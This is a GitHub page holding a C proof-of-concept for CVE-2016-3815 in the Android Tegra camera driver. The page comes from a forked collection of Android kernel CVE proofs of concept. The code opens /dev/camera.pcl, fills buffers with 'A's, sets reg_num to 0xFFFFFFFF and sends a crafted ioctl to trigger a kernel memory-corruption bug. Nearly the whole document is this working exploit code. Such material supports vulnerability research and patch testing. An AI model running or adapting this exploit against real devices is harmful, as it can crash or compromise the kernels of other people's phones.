forked from ScottyBauer/Android_Kernel_CVE_POCs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2016-3815.c
108 lines (92 loc) · 2.46 KB
/
CVE-2016-3815.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
/*** CVE-2016-3815.c
*
* https://code.google.com/p/android/issues/detail?id=208804
* https://android.googlesource.com/kernel/tegra.git/+/android-tegra-flounder-3.10-n-preview-2/drivers/media/platform/tegra/cam_dev/virtual.c#433
*
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>
#include <strings.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
typedef uint32_t __u32;
typedef unsigned char __u8;
const char *dev = "/dev/camera.pcl";
#define CAMERA_MAX_NAME_LENGTH 32
#define VIRTUAL_DEV_MAX_REGULATORS 8
#define VIRTUAL_DEV_MAX_GPIOS 8
#define VIRTUAL_DEV_MAX_POWER_SIZE 32
#define VIRTUAL_REGNAME_SIZE (VIRTUAL_DEV_MAX_REGULATORS * \
CAMERA_MAX_NAME_LENGTH) //256
enum {
CAMERA_DEVICE_TYPE_I2C,
CAMERA_DEVICE_TYPE_MAX_NUM,
};
enum regcache_type {
REGCACHE_NONE,
REGCACHE_RBTREE,
REGCACHE_COMPRESSED,
REGCACHE_FLAT,
};
struct regmap_cfg {
int addr_bits;
int val_bits;
__u32 cache_type;
};
struct virtual_device {
//void *power_on;
//void *power_off;
uint32_t k;
uint32_t w;
struct regmap_cfg regmap_cfg;
__u32 bus_type;
__u32 gpio_num;
__u32 reg_num;
__u32 pwr_on_size;
__u32 pwr_off_size;
__u32 clk_num;
__u8 name[32];
__u8 reg_names[VIRTUAL_REGNAME_SIZE];
};
#define PCLLK_IOCTL_CHIP_REG _IOW('o', 100, struct virtual_device)
int main(void)
{
int fd;
struct virtual_device vdev = { 0 };
fd = open(dev, O_RDWR);
if (fd < 0) {
printf("Failed to open %s with errno as %s\n",
dev, strerror(errno));
return EXIT_FAILURE;
}
vdev.k = 1;
vdev.w = 1;
/*
vdev.power_on = mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
vdev.power_off = vdev.power_on;
if (vdev.power_on == MAP_FAILED) {
close(fd);
printf("Failed to mmap some data with %s\n", strerror(errno));
return EXIT_FAILURE;
}
*/
memset(vdev.name, 'A', 32);
printf("%s\n", vdev.name);
memset(vdev.reg_names, 'A', VIRTUAL_REGNAME_SIZE);
vdev.reg_num = 0xFFFFFFFF;
vdev.bus_type = CAMERA_DEVICE_TYPE_I2C;
vdev.regmap_cfg.addr_bits = 16;
vdev.regmap_cfg.val_bits = 8;
vdev.regmap_cfg.cache_type = REGCACHE_NONE;
vdev.gpio_num = 1;
vdev.pwr_on_size = 1;
vdev.pwr_off_size = 1; /* prevent null terminiation */
ioctl(fd, PCLLK_IOCTL_CHIP_REG, &vdev);
return EXIT_FAILURE;
}